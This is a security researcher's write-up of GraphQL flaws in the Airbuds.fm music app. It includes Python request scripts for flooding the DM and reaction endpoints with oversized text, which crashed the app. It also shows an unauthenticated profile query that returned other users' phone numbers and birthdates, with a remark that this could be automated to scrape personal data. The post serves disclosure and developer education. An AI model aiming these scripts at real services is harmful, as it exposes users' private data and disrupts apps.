Airbuds.fm: GraphQL Privacy Oversight in a Social Music App
Why I Looked Into This
In early October 2024, I started investigating the Airbuds.fm app. At the time, it had grown to over 3 million users and ranked among the top 10 music apps on the App Store. Airbuds.fm is a social music app that lets users share listening activity and weekly music stats with friends.
Like many mobile apps, it uses a GraphQL API on the backend, a pattern I've seen repeatedly across mobile platforms. This would be the third app in a row I've reviewed with significant GraphQL security concerns.
Initial Discovery
Introspection Query Disabled
First check: introspection. Many GraphQL vulnerabilities start with the schema being exposed via an introspection query:
```graphql
query IntrospectionQuery {
  __schema {
    queryType { name }
    types {
      name
      fields { name }
    }
  }
}
```
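To run this check against a live endpoint, a probe along the lines below is enough; the endpoint URL here is a placeholder, not the app's real API host. If the response contains a populated __schema object, introspection is exposed.

```python
# Introspection probe. ENDPOINT is a placeholder, not the real Airbuds.fm API host.
import requests

ENDPOINT = "https://api.example.com/graphql"
INTROSPECTION = """
query IntrospectionQuery {
  __schema {
    queryType { name }
    types { name fields { name } }
  }
}
"""

resp = requests.post(ENDPOINT, json={"query": INTROSPECTION}, timeout=15)
body = resp.json()

if (body.get("data") or {}).get("__schema"):
    print("Introspection is ENABLED: the schema is exposed.")
else:
    print("Introspection disabled or blocked:", body.get("errors"))
```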
In Airbuds.fm's case, they followed best practices and had introspection disabled in production. That's a win.
But that didn't stop the investigation.
Native Query Analysis
Without introspection, I turned to traffic from the app itself using a MITM proxy. I identified three key GraphQL operations to investigate:
1. SendDM
```graphql
mutation SendDM($message: String!) {
  sendDM(message: $message) {
    id
    text
    createdAt
  }
}
```
2. ReactToFeedActivity
```graphql
mutation ReactToFeedActivity($reaction: CreateFeedActivityReactionInput!) {
  reactToFeedActivity(reaction: $reaction) {
    __typename
  }
}
```
3. UserProfile and Me
```graphql
query Me {
  me {
    profileURL
    phone
    phoneVerified
    birthdate
  }
}

query UserProfile($identifier: String!) {
  user(identifier: $identifier) {
    profileURL
  }
}
```
These gave me the groundwork for two lines of testing:
- Character limit abuse
- Parameter modification for sensitive data exposure
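As a quick note on tooling: the operations above were pulled out of intercepted traffic, and a small mitmproxy addon roughly like the one below is enough to surface them, logging each GraphQL operation name and its variable keys as you drive the app. The /graphql path is an assumption; adjust it to whatever endpoint the proxy actually shows.

```python
# graphql_logger.py: mitmproxy addon that logs GraphQL operation names and variable keys.
# Run with: mitmproxy -s graphql_logger.py
import json

from mitmproxy import http

GRAPHQL_PATH = "/graphql"  # assumption; match against the endpoint seen in the proxy


def request(flow: http.HTTPFlow) -> None:
    if flow.request.method != "POST" or GRAPHQL_PATH not in flow.request.path:
        return
    try:
        body = json.loads(flow.request.get_text() or "{}")
    except json.JSONDecodeError:
        return
    op = body.get("operationName") or "<anonymous>"
    variables = list((body.get("variables") or {}).keys())
    print(f"[graphql] {op} variables={variables}")
```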
Character Limit Testing
For abuse testing, I use the Bee Movie script: a large block of text that serves as a simple stress test.
DM Injection
I used the Bee Movie script as a direct message:
- It sent successfully
- No app crash
- Full render, screenshot captured
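The replay itself is nothing exotic. A request shaped like the sketch below pushes an arbitrarily large message through the SendDM mutation; the endpoint URL, the bearer-token auth scheme, and the token value are all placeholders rather than the app's real details.

```python
# Oversized-DM replay sketch. ENDPOINT, TOKEN, and the bearer auth scheme are placeholders.
import requests

ENDPOINT = "https://api.example.com/graphql"
TOKEN = "REDACTED"  # session token captured from the app's own traffic

SEND_DM = """
mutation SendDM($message: String!) {
  sendDM(message: $message) {
    id
    text
    createdAt
  }
}
"""

oversized = "According to all known laws of aviation... " * 2000  # roughly 85 KB of text

resp = requests.post(
    ENDPOINT,
    json={"operationName": "SendDM", "query": SEND_DM, "variables": {"message": oversized}},
    headers={"Authorization": f"Bearer {TOKEN}"},
    timeout=30,
)
print(resp.status_code, resp.text[:200])
```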
Emoji Reaction Abuse
I injected the Bee Movie script as a song reaction emoji:
- Successfully submitted
- Crashed the app when scrolling past the affected post
- Resolved by deleting the reaction using a modified delete query
These tests confirmed the absence of input limits on both endpoints: client-side checks were in place, but server-side validation was missing.
Unauthorized Data Exposure
The most impactful finding came from modifying the UserProfile query to match the structure of the authenticated Me query:
```graphql
query UserProfile($identifier: String!) {
  user(identifier: $identifier) {
    profileURL
    phone
    phoneVerified
    birthdate
  }
}
```
Result:
```json
{
  "data": {
    "user": {
      "profileURL": "https://i.airbuds.fm/redacted",
      "phone": "REDACTED",
      "phoneVerified": true,
      "birthdate": "REDACTED"
    }
  }
}
```
Despite being unauthenticated, this query returned private user data, including:
- Phone numbers
- Birthdates
- Phone verification status
The attack surface was narrowed by the need for valid usernames, but with automation this could be used to scrape PII at scale.
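To make the "unauthenticated" part concrete, the request below carries no Authorization header at all; the endpoint and the username are placeholders, and only the shape of the call matters here.

```python
# Shape of the unauthenticated profile lookup. ENDPOINT and the username are placeholders.
import requests

ENDPOINT = "https://api.example.com/graphql"

USER_PROFILE = """
query UserProfile($identifier: String!) {
  user(identifier: $identifier) {
    profileURL
    phone
    phoneVerified
    birthdate
  }
}
"""

resp = requests.post(
    ENDPOINT,
    json={
        "operationName": "UserProfile",
        "query": USER_PROFILE,
        "variables": {"identifier": "some-known-username"},  # placeholder identifier
    },
    timeout=15,  # note: no Authorization header anywhere in this request
)
print(resp.json())
```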
Key Lessons & Recommendations
Wins:
- Introspection disabled
- DM and profile endpoints rejected spoofing attempts
Issues Identified:
- No character limit on message and emoji inputs
- Sensitive fields exposed through unauthorized parameter injection
- No field-level access controls on public queries
- Client-side checks not mirrored server-side
Recommendations for Devs
- Enforce input validation server-side, not just in the client (see the sketch after this list)
- Limit character length on all user-input fields (emoji, DM, bio, etc.)
- Implement strict field-level access control
- Disable unnecessary fields in public queries
- Regularly test your GraphQL schema using manual and automated abuse simulation
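To make the first and third recommendations concrete, here is a minimal, framework-agnostic sketch of what the missing server-side controls could look like. The function names, limits, and field names are illustrative, not Airbuds.fm's actual implementation.

```python
# Illustrative resolver-level controls: a server-side length limit on messages and
# field-level filtering of sensitive profile data. No specific GraphQL framework assumed.

MAX_MESSAGE_LEN = 1_000
SENSITIVE_FIELDS = {"phone", "phoneVerified", "birthdate"}


def resolve_send_dm(viewer_id: str, message: str) -> dict:
    """Reject oversized messages on the server, regardless of any client-side checks."""
    if len(message) > MAX_MESSAGE_LEN:
        raise ValueError(f"message exceeds {MAX_MESSAGE_LEN} characters")
    return {"id": "msg_1", "senderId": viewer_id, "text": message}


def resolve_user(viewer_id: str | None, target_user: dict, requested_fields: set[str]) -> dict:
    """Only the authenticated owner may read sensitive fields on a profile."""
    allowed = set(requested_fields)
    if viewer_id is None or viewer_id != target_user["id"]:
        allowed -= SENSITIVE_FIELDS
    return {field: target_user[field] for field in allowed if field in target_user}


# An anonymous viewer asking for everything only gets the public field back.
profile = {"id": "u1", "profileURL": "https://example.com/u1", "phone": "+15550100", "birthdate": "1999-01-01"}
print(resolve_user(None, profile, {"profileURL", "phone", "phoneVerified", "birthdate"}))
```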
Final Thoughts
Airbuds.fm isn't the first app I've seen with these issues, and it won't be the last. GraphQL APIs are flexible but unforgiving if you don't secure them properly.
This app did take important precautions like disabling introspection and rejecting unauthorized user spoofing. But it also had avoidable oversights in data exposure and payload validation.
For security researchers, this case is a reminder: just because introspection is disabled doesn't mean an API is safe.